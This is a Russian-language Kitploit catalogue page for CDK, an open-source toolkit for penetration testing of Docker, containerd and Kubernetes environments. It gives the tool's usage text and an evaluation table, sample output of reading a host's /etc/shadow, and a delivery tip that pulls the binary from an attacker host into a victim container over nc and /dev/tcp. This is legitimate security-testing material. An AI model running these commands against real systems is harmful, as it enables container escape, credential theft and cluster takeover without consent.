Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CDK — 📦 Сделайте тестирование безопасности K8s, Docker и Containerd проще. | Kitploit
Инструменты/GitHubGitHub/cdk-team/cdk
Повышение привилегийРазведкаБезопасность контейнеровМеханизмы персистентностиЭксплуатацияЛатеральное перемещениеПост-эксплуатацияТестирование на ПроникновениеБезопасность облачных средПобег из КонтейнераТоп в Побег из Контейнера №2
4.7k606655 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubcdk-team/cdk

CDK

📦 Сделайте тестирование безопасности K8s, Docker и Containerd проще.

РепозиторийСайт

CDK - Набор инструментов для проникновения в контейнеры без зависимостей

Английский | 简体中文

png

Правовое уведомление

Использование CDK для атак на цели без предварительного взаимного согласия незаконно. CDK предназначен только для целей тестирования безопасности.

Обзор

CDK — это набор инструментов с открытым исходным кодом для проникновения в контейнеры, предназначенный для обеспечения стабильной эксплуатации в различных облегченных контейнерах без каких-либо зависимостей от ОС. Он включает полезные сетевые инструменты и множество мощных PoC/EXP, а также помогает легко выйти из контейнера и захватить кластер K8s.

Быстрый старт

Запустите cdk eva для получения оценочной информации и рекомендуемого эксплойта, затем выполните cdk run для начала атаки.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Установка/Доставка

Загрузите последний релиз по адресу https://github.com/cdk-team/CDK/releases/

Поместите исполняемые файлы в целевой контейнер и начните тестирование.

СОВЕТЫ: Доставка CDK в целевой контейнер при реальном тестировании на проникновение

Если у вас есть эксплойт, который может загрузить файл, вы можете загрузить бинарный файл CDK напрямую.

Если у вас есть эксплойт RCE, но в целевом контейнере нет curl или wget, вы можете использовать следующий метод для доставки CDK:

  1. Сначала разместите бинарный файл CDK на вашем хосте с публичным IP.
(on your host)
nc -lvp 999 < cdk
  1. Внутри контейнера жертвы выполните
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Использование

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Возможности

CDK имеет три модуля:

  1. Evaluate (Оценка): сбор информации внутри контейнера для выявления потенциальных уязвимостей.
  2. Exploit (Эксплуатация): для выхода из контейнера, закрепления и бокового перемещения.
  3. Tool (Инструменты): сетевые инструменты и API для TCP/HTTP запросов, туннелей и управления кластером K8s.

Модуль Evaluate

Usage

cdk evaluate [--full]
ТактикаСкриптПоддерживаетсяИспользование/Пример
Сбор информацииБазовая информация об ОС✔ссылка
Сбор информацииДоступные возможности✔ссылка
Сбор информацииДоступные команды Linux✔ссылка
Сбор информацииТочки монтирования✔ссылка
Сбор информацииСетевой namespace✔ссылка
Сбор информацииЧувствительные ENV✔ссылка
Сбор информацииЧувствительные процессы✔ссылка
Сбор информацииЧувствительные локальные файлы✔ссылка
Сбор информацииKube-proxy Route Localnet(CVE-2020-8558)✔ссылка
Сбор информацииDNS-обнаружение служб✔ссылка
ОбнаружениеИнформация об API-сервере K8s✔ссылка
ОбнаружениеИнформация о сервис-аккаунте K8s✔ссылка
ОбнаружениеAPI метаданных облачного провайдера✔ссылка

Модуль Exploit

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
Скачать инструмент